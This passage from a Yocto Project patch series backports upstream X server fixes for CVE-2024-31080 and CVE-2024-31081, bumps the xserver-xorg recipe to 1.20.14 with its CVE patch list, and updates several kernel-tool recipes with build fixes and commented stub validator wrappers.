52 CloseDeviceList(&inputInfo.devices);
53 CloseDeviceList(&inputInfo.off_devices);
54
55--
56GitLab
57
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
new file mode 100644
index 0000000000..da735efb2b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
@@ -0,0 +1,49 @@
1From 96798fc1967491c80a4d0c8d9e0a80586cb2152b Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Fri, 22 Mar 2024 18:51:45 -0700
4Subject: [PATCH] Xi: ProcXIGetSelectedEvents needs to use unswapped length to
5 send reply
6
7CVE-2024-31080
8
9Reported-by: https://debbugs.gnu.org/cgi/bugreport.cgi?bug=69762
10Fixes: 53e821ab4 ("Xi: add request processing for XIGetSelectedEvents.")
11Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
12Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
13
14Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/96798fc1967491c80a4d0c8d9e0a80586cb2152b]
15CVE: CVE-2024-31080
16Signed-off-by: Ashish Sharma <asharma@mvista.com>
17
18 Xi/xiselectev.c | 5 ++++-
19 1 file changed, 4 insertions(+), 1 deletion(-)
20
21diff --git a/Xi/xiselectev.c b/Xi/xiselectev.c
22index edcb8a0d36..ac14949871 100644
23--- a/Xi/xiselectev.c
24+++ b/Xi/xiselectev.c
25@@ -349,6 +349,7 @@ ProcXIGetSelectedEvents(ClientPtr client)
26 InputClientsPtr others = NULL;
27 xXIEventMask *evmask = NULL;
28 DeviceIntPtr dev;
29+ uint32_t length;
30
31 REQUEST(xXIGetSelectedEventsReq);
32 REQUEST_SIZE_MATCH(xXIGetSelectedEventsReq);
33@@ -418,10 +419,12 @@ ProcXIGetSelectedEvents(ClientPtr client)
34 }
35 }
36
37+ /* save the value before SRepXIGetSelectedEvents swaps it */
38+ length = reply.length;
39 WriteReplyToClient(client, sizeof(xXIGetSelectedEventsReply), &reply);
40
41 if (reply.num_masks)
42- WriteToClient(client, reply.length * 4, buffer);
43+ WriteToClient(client, length * 4, buffer);
44
45 free(buffer);
46 return Success;
47--
48GitLab
49
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
new file mode 100644
index 0000000000..d2c551a0e5
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
@@ -0,0 +1,47 @@
1From 3e77295f888c67fc7645db5d0c00926a29ffecee Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Fri, 22 Mar 2024 18:56:27 -0700
4Subject: [PATCH] Xi: ProcXIPassiveGrabDevice needs to use unswapped length to
5 send reply
6
7CVE-2024-31081
8
9Fixes: d220d6907 ("Xi: add GrabButton and GrabKeysym code.")
10Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
11Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
12
13Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/3e77295f888c67fc7645db5d0c00926a29ffecee]
14CVE: CVE-2024-31081
15Signed-off-by: Ashish Sharma <asharma@mvista.com>
16
17 Xi/xipassivegrab.c | 5 ++++-
18 1 file changed, 4 insertions(+), 1 deletion(-)
19
20diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
21index c9ac2f8553..896233bec2 100644
22--- a/Xi/xipassivegrab.c
23+++ b/Xi/xipassivegrab.c
24@@ -93,6 +93,7 @@ ProcXIPassiveGrabDevice(ClientPtr client)
25 GrabParameters param;
26 void *tmp;
27 int mask_len;
28+ uint32_t length;
29
30 REQUEST(xXIPassiveGrabDeviceReq);
31 REQUEST_FIXED_SIZE(xXIPassiveGrabDeviceReq,
32@@ -247,9 +248,11 @@ ProcXIPassiveGrabDevice(ClientPtr client)
33 }
34 }
35
36+ /* save the value before SRepXIPassiveGrabDevice swaps it */
37+ length = rep.length;
38 WriteReplyToClient(client, sizeof(rep), &rep);
39 if (rep.num_modifiers)
40- WriteToClient(client, rep.length * 4, modifiers_failed);
41+ WriteToClient(client, length * 4, modifiers_failed);
42
43 out:
44 free(modifiers_failed);
45--
46GitLab
47
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
new file mode 100644
index 0000000000..04a6e734ef
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
@@ -0,0 +1,61 @@
1require xserver-xorg.inc
2
3SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
4 file://pkgconfig.patch \
5 file://0001-test-xtest-Initialize-array-with-braces.patch \
6 file://sdksyms-no-build-path.patch \
7 file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
8 file://CVE-2022-3550.patch \
9 file://CVE-2022-3551.patch \
10 file://CVE-2022-3553.patch \
11 file://CVE-2022-4283.patch \
12 file://CVE-2022-46340.patch \
13 file://CVE-2022-46341.patch \
14 file://CVE-2022-46342.patch \
15 file://CVE-2022-46343.patch \
16 file://CVE-2022-46344.patch \
17 file://CVE-2023-0494.patch \
18 file://CVE-2023-1393.patch \
19 file://CVE-2023-5367.patch \
20 file://CVE-2023-5380.patch \
21 file://CVE-2023-6377.patch \
22 file://CVE-2023-6478.patch \
23 file://CVE-2023-6816.patch \
24 file://CVE-2024-0229-1.patch \
25 file://CVE-2024-0229-2.patch \
26 file://CVE-2024-0229-3.patch \
27 file://CVE-2024-0229-4.patch \
28 file://CVE-2024-21885.patch \
29 file://CVE-2024-21886-1.patch \
30 file://CVE-2024-21886-2.patch \
31 file://CVE-2024-0408.patch \
32 file://CVE-2024-0409.patch \
33 file://CVE-2024-31081.patch \
34 file://CVE-2024-31080.patch \
35"
36SRC_URI[md5sum] = "453fc86aac8c629b3a5b77e8dcca30bf"
37SRC_URI[sha256sum] = "54b199c9280ff8bf0f73a54a759645bd0eeeda7255d1c99310d5b7595f3ac066"
38
39CFLAGS += "-fcommon"
40
41# These extensions are now integrated into the server, so declare the migration
42# path for in-place upgrades.
43
44RREPLACES_${PN} = "${PN}-extension-dri \
45 ${PN}-extension-dri2 \
46 ${PN}-extension-record \
47 ${PN}-extension-extmod \
48 ${PN}-extension-dbe \
49 "
50RPROVIDES_${PN} = "${PN}-extension-dri \
51 ${PN}-extension-dri2 \
52 ${PN}-extension-record \
53 ${PN}-extension-extmod \
54 ${PN}-extension-dbe \
55 "
56RCONFLICTS_${PN} = "${PN}-extension-dri \
57 ${PN}-extension-dri2 \
58 ${PN}-extension-record \
59 ${PN}-extension-extmod \
60 ${PN}-extension-dbe \
61 "
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
deleted file mode 100644
index 2af1b6f307..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
+++ /dev/null
@@ -1,39 +0,0 @@
1require xserver-xorg.inc
2
3SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
4 file://pkgconfig.patch \
5 file://0001-test-xtest-Initialize-array-with-braces.patch \
6 file://sdksyms-no-build-path.patch \
7 file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
8 file://CVE-2020-14347.patch \
9 file://CVE-2020-14346.patch \
10 file://CVE-2020-14361.patch \
11 file://CVE-2020-14362.patch \
12 file://CVE-2020-14345.patch \
13 "
14SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839"
15SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146"
16
17CFLAGS += "-fcommon"
18
19# These extensions are now integrated into the server, so declare the migration
20# path for in-place upgrades.
21
22RREPLACES_${PN} = "${PN}-extension-dri \
23 ${PN}-extension-dri2 \
24 ${PN}-extension-record \
25 ${PN}-extension-extmod \
26 ${PN}-extension-dbe \
27 "
28RPROVIDES_${PN} = "${PN}-extension-dri \
29 ${PN}-extension-dri2 \
30 ${PN}-extension-record \
31 ${PN}-extension-extmod \
32 ${PN}-extension-dbe \
33 "
34RCONFLICTS_${PN} = "${PN}-extension-dri \
35 ${PN}-extension-dri2 \
36 ${PN}-extension-record \
37 ${PN}-extension-extmod \
38 ${PN}-extension-dbe \
39 "
diff --git a/meta/recipes-kernel/blktrace/blktrace_git.bb b/meta/recipes-kernel/blktrace/blktrace_git.bb
index 6903053b5b..2110bc75fa 100644
--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -1,4 +1,9 @@
1SUMMARY = "Generates traces of I/O traffic on block devices" 1SUMMARY = "Generates traces of I/O traffic on block devices"
2DESCRIPTION = "blktrace is a block layer IO tracing mechanism which provides \
3detailed information about request queue operations up to user space. There \
4are three major components: a kernel component, a utility to record the i/o \
5trace information for the kernel to user space, and utilities to analyse and \
6view the trace information."
2HOMEPAGE = "http://brick.kernel.dk/snaps/" 7HOMEPAGE = "http://brick.kernel.dk/snaps/"
3LICENSE = "GPLv2" 8LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833" 9LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
@@ -9,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
9 14
10PV = "1.2.0+git${SRCPV}" 15PV = "1.2.0+git${SRCPV}"
11 16
12SRC_URI = "git://git.kernel.dk/blktrace.git \ 17SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
13 file://ldflags.patch \ 18 file://ldflags.patch \
14 file://CVE-2018-10689.patch \ 19 file://CVE-2018-10689.patch \
15 file://make-btt-scripts-python3-ready.patch \ 20 file://make-btt-scripts-python3-ready.patch \
diff --git a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
index 552eb6abaa..d7c7918515 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
+++ b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
@@ -9,6 +9,9 @@ DEPENDS += "cryptodev-linux"
9 9
10SRC_URI += " \ 10SRC_URI += " \
11file://0001-Disable-installing-header-file-provided-by-another-p.patch \ 11file://0001-Disable-installing-header-file-provided-by-another-p.patch \
12file://0001-Fix-build-for-Linux-5.8-rc1.patch \
13file://0001-Fix-build-for-Linux-5.9-rc1.patch \
14file://fix-build-for-Linux-5.11-rc1.patch \
12" 15"
13 16
14EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"' 17EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"'
diff --git a/meta/recipes-kernel/cryptodev/cryptodev.inc b/meta/recipes-kernel/cryptodev/cryptodev.inc
index f99f8bc9f0..f02619cabe 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -1,9 +1,14 @@
1HOMEPAGE = "http://cryptodev-linux.org/" 1HOMEPAGE = "http://cryptodev-linux.org/"
2DESCRIPTION = "Cryptodev-linux is a device that allows access to Linux kernel \
3cryptographic drivers; thus allowing of userspace applications to take advantage \
4of hardware accelerators. Cryptodev-linux is implemented as a standalone \
5module that requires no dependencies other than a stock linux kernel. Its \
6API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
2 7
3LICENSE = "GPLv2" 8LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 9LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
5 10
6SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \ 11SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
7 " 12 "
8SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b" 13SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b"
9 14
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
new file mode 100644
index 0000000000..02c721a4f3
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
@@ -0,0 +1,49 @@
1From 9e765068582aae3696520346a7500322ca6cc2de Mon Sep 17 00:00:00 2001
2From: Joan Bruguera <joanbrugueram@gmail.com>
3Date: Sat, 13 Jun 2020 19:46:44 +0200
4Subject: [PATCH] Fix build for Linux 5.8-rc1
5
6See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9740ca4e95b43b91a4a848694a20d01ba6818f7b
7 https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=da1c55f1b272f4bd54671d459b39ea7b54944ef9
8 https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d8ed45c5dcd455fc5848d47f86883a1b872ac0d0
9
10Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
11
12Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]
13
14Signed-off-by: He Zhe <zhe.he@windriver.com>
15---
16 zc.c | 8 ++++++++
17 1 file changed, 8 insertions(+)
18
19diff --git a/zc.c b/zc.c
20index ae464ff..2c286bb 100644
21--- a/zc.c
22+++ b/zc.c
23@@ -58,7 +58,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
24 return 0;
25 }
26
27+#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
28 down_read(&mm->mmap_sem);
29+#else
30+ mmap_read_lock(mm);
31+#endif
32 #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 6, 0))
33 ret = get_user_pages(task, mm,
34 (unsigned long)addr, pgcount, write, 0, pg, NULL);
35@@ -74,7 +78,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
36 (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
37 pg, NULL, NULL);
38 #endif
39+#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
40 up_read(&mm->mmap_sem);
41+#else
42+ mmap_read_unlock(mm);
43+#endif
44 if (ret != pgcount)
45 return -EINVAL;
46
47--
482.17.1
49
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
new file mode 100644
index 0000000000..cf1c04df9e
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
@@ -0,0 +1,42 @@
1From 2f5e08aebf9229599aae7f25db752f74221cd71d Mon Sep 17 00:00:00 2001
2From: Joan Bruguera <joanbrugueram@gmail.com>
3Date: Fri, 14 Aug 2020 00:13:38 +0200
4Subject: [PATCH] Fix build for Linux 5.9-rc1
5
6See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64019a2e467a288a16b65ab55ddcbf58c1b00187
7 https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce617edecada007aee8610fbe2c14d10b8de2f6
8 https://lore.kernel.org/lkml/CAHk-=wj_V2Tps2QrMn20_W0OJF9xqNh52XSGA42s-ZJ8Y+GyKw@mail.gmail.com/
9
10Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
11
12Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/2f5e08aebf9229599aae7f25db752f74221cd71d]
13
14Signed-off-by: Naveen Saini <naveen.kumar.saini@intel.com>
15
16---
17 zc.c | 6 +++++-
18 1 file changed, 5 insertions(+), 1 deletion(-)
19
20diff --git a/zc.c b/zc.c
21index a560db5..fdf7da1 100644
22--- a/zc.c
23+++ b/zc.c
24@@ -76,10 +76,14 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
25 ret = get_user_pages_remote(task, mm,
26 (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
27 pg, NULL);
28-#else
29+#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 9, 0))
30 ret = get_user_pages_remote(task, mm,
31 (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
32 pg, NULL, NULL);
33+#else
34+ ret = get_user_pages_remote(mm,
35+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
36+ pg, NULL, NULL);
37 #endif
38 #if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
39 up_read(&mm->mmap_sem);
40--
412.17.1
42
diff --git a/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
new file mode 100644
index 0000000000..3ae77cb9d6
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
@@ -0,0 +1,32 @@
1From 55c6315058fc0dd189ffd116f2cc27ba4fa84cb6 Mon Sep 17 00:00:00 2001
2From: Joan Bruguera <joanbrugueram@gmail.com>
3Date: Mon, 28 Dec 2020 01:41:31 +0100
4Subject: [PATCH] Fix build for Linux 5.11-rc1
5
6ksys_close was removed, as far as I can tell, close_fd replaces it.
7
8See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8760c909f54a82aaa6e76da19afe798a0c77c3c3
9 https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1572bfdf21d4d50e51941498ffe0b56c2289f783
10
11Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/55c6315058fc0dd189ffd116f2cc27ba4fa84cb6]
12Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
13---
14 ioctl.c | 4 +++-
15 1 file changed, 3 insertions(+), 1 deletion(-)
16
17diff --git a/ioctl.c b/ioctl.c
18index 3d332380..95481d4f 100644
19--- a/ioctl.c
20+++ b/ioctl.c
21@@ -871,8 +871,10 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
22 if (unlikely(ret)) {
23 #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 17, 0))
24 sys_close(fd);
25-#else
26+#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0))
27 ksys_close(fd);
28+#else
29+ close_fd(fd);
30 #endif
31 return ret;
32 }
diff --git a/meta/recipes-kernel/dtc/dtc.inc b/meta/recipes-kernel/dtc/dtc.inc
index 5da6c24fbf..461ab8fbd3 100644
--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,7 +5,7 @@ SECTION = "bootloader"
5LICENSE = "GPLv2 | BSD" 5LICENSE = "GPLv2 | BSD"
6DEPENDS = "flex-native bison-native" 6DEPENDS = "flex-native bison-native"
7 7
8SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \ 8SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
9 file://make_install.patch \ 9 file://make_install.patch \
10 file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \ 10 file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
11 " 11 "
diff --git a/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
new file mode 100644
index 0000000000..ec825cbf7b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
@@ -0,0 +1,35 @@
1From 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d Mon Sep 17 00:00:00 2001
2From: David Gibson <david@gibson.dropbear.id.au>
3Date: Wed, 6 Jan 2021 14:52:26 +1100
4Subject: [PATCH] fdtdump: Fix gcc11 warning
5
6In one place, fdtdump abuses fdt_set_magic(), passing it just a small char
7array instead of the full fdt header it expects. That's relying on the
8fact that in fact fdt_set_magic() will only actually access the first 4
9bytes of the buffer.
10
11This trips a new warning in GCC 11 - and it's entirely possible it was
12always UB. So, don't do that.
13
14Upstream-Status: Backport [https://git.kernel.org/pub/scm/utils/dtc/dtc.git/patch/?id=ca16a723fa9dde9c5da80dba567f48715000e77c]
15Signed-off-by: David Gibson <david@gibson.dropbear.id.au>
16---
17 fdtdump.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/fdtdump.c b/fdtdump.c
21index 9613bef..d9fb374 100644
22--- a/fdtdump.c
23+++ b/fdtdump.c
24@@ -217,7 +217,7 @@ int main(int argc, char *argv[])
25 char *p = buf;
26 char *endp = buf + len;
27
28- fdt_set_magic(smagic, FDT_MAGIC);
29+ fdt32_st(smagic, FDT_MAGIC);
30
31 /* poor man's memmem */
32 while ((endp - p) >= FDT_MAGIC_SIZE) {
33--
342.30.1
35
diff --git a/meta/recipes-kernel/dtc/dtc_1.6.0.bb b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
index 92df70d9fc..a407137859 100644
--- a/meta/recipes-kernel/dtc/dtc_1.6.0.bb
+++ b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
@@ -5,6 +5,8 @@ LIC_FILES_CHKSUM = "file://GPL;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
5 5
6SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30" 6SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30"
7 7
8SRC_URI += "file://0001-fdtdump-Fix-gcc11-warning.patch"
9
8S = "${WORKDIR}/git" 10S = "${WORKDIR}/git"
9 11
10BBCLASSEXTEND = "native nativesdk" 12BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
new file mode 100644
index 0000000000..2aa57851c7
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
@@ -0,0 +1,20 @@
1#!/bin/sh
2# dt-doc-validate wrapper to allow kernel dt-validation to pass
3#
4# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
5# License: MIT (see COPYING.MIT at the root of the repository for terms)
6
7for arg; do
8 case "$arg" in
9 --version)
10 echo "v2021.10"
11 ;;
12 esac
13done
14
15# TBD: left for future consideration
16# exec dt-doc-validate.real "$@"
17
18# we always succeed
19exit 0
20
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
new file mode 100644
index 0000000000..24b89d8619
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
@@ -0,0 +1,20 @@
1#!/bin/sh
2# dt-mk-schema wrapper to allow kernel dt-validation to pass
3#
4# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
5# License: MIT (see COPYING.MIT at the root of the repository for terms)
6
7for arg; do
8 case "$arg" in
9 --version)
10 echo "v2021.10"
11 ;;
12 esac
13done
14
15# TBD: left for future consideration
16# exec dt-mk-schema.real "$@"
17
18# we always succeed
19exit 0
20
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
new file mode 100644
index 0000000000..8a4710a7ed
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
@@ -0,0 +1,20 @@
1#!/bin/sh
2# dt-validate wrapper to allow kernel dt-validation to pass
3#
4# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
5# License: MIT (see COPYING.MIT at the root of the repository for terms)
6
7for arg; do
8 case "$arg" in
9 --version)
10 echo "v2021.10"
11 ;;
12 esac
13done
14
15# TBD: left for future consideration
16# exec dt-validate.real "$@"
17
18# we always succeed
19exit 0
20
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
new file mode 100644
index 0000000000..c869274d09
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
@@ -0,0 +1,17 @@
1DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema"
2HOMEPAGE = "https://yoctoproject.org"
3LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
5
6SRC_URI = "file://dt-doc-validate \
7 file://dt-mk-schema \
8 file://dt-validate"
9
10do_install() {
11 install -d ${D}${bindir}/
12 install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/
13 install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/
14 install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/
15}
16
17BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index 4f1af731d6..82d678e509 100644
--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Tools for managing Yocto Project style branched kernels" 1SUMMARY = "Tools for managing Yocto Project style branched kernels"
2DESCRIPTION = "Powerful set of tools or managing Yocto Linux kernel sources \
3and configuration data. You can use these tools to make a single configuration \
4change, apply multiple patches, or work with your own kernel sources."
5HOMEPAGE = "https://www.yoctoproject.org/"
2LICENSE = "GPLv2" 6LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501" 7LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501"
4 8
@@ -10,7 +14,7 @@ PV = "0.2+git${SRCPV}"
10 14
11inherit native 15inherit native
12 16
13SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git" 17SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
14S = "${WORKDIR}/git" 18S = "${WORKDIR}/git"
15UPSTREAM_CHECK_COMMITS = "1" 19UPSTREAM_CHECK_COMMITS = "1"
16 20
diff --git a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
index 871b36440f..206c6ccae7 100644
--- a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
+++ b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
@@ -30,6 +30,9 @@ inherit autotools update-rc.d systemd
30export LDFLAGS = "-L${STAGING_LIBDIR}" 30export LDFLAGS = "-L${STAGING_LIBDIR}"
31EXTRA_OECONF = " --with-zlib=yes" 31EXTRA_OECONF = " --with-zlib=yes"
32 32
33# affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
34CVE_CHECK_WHITELIST += "CVE-2021-20269"
35
33do_compile_prepend() { 36do_compile_prepend() {
34 # Remove the prepackaged config.h from the source tree as it overrides 37 # Remove the prepackaged config.h from the source tree as it overrides
35 # the same file generated by configure and placed in the build tree 38 # the same file generated by configure and placed in the build tree
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index 5dae30ed88..631b50658a 100644
--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f"
18# Lookout for PV bump too when SRCREV is changed 18# Lookout for PV bump too when SRCREV is changed
19PV = "26" 19PV = "26"
20 20
21SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \ 21SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
22 file://depmod-search.conf \ 22 file://depmod-search.conf \
23 file://0001-build-Stop-using-dolt.patch \ 23 file://0001-build-Stop-using-dolt.patch \
24 file://avoid_parallel_tests.patch \ 24 file://avoid_parallel_tests.patch \
@@ -26,7 +26,6 @@ SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
26 26
27S = "${WORKDIR}/git" 27S = "${WORKDIR}/git"
28 28
29EXTRA_AUTORECONF += "--install --symlink"
30EXTRA_OECONF +=" --enable-tools --with-zlib" 29EXTRA_OECONF +=" --enable-tools --with-zlib"
31 30
32PACKAGECONFIG[debug] = "--enable-debug,--disable-debug" 31PACKAGECONFIG[debug] = "--enable-debug,--disable-debug"
diff --git a/meta/recipes-kernel/kmod/kmod/ptest.patch b/meta/recipes-kernel/kmod/kmod/ptest.patch
deleted file mode 100644
index 831dbcb909..0000000000
--- a/meta/recipes-kernel/kmod/kmod/ptest.patch
+++ /dev/null
@@ -1,25 +0,0 @@
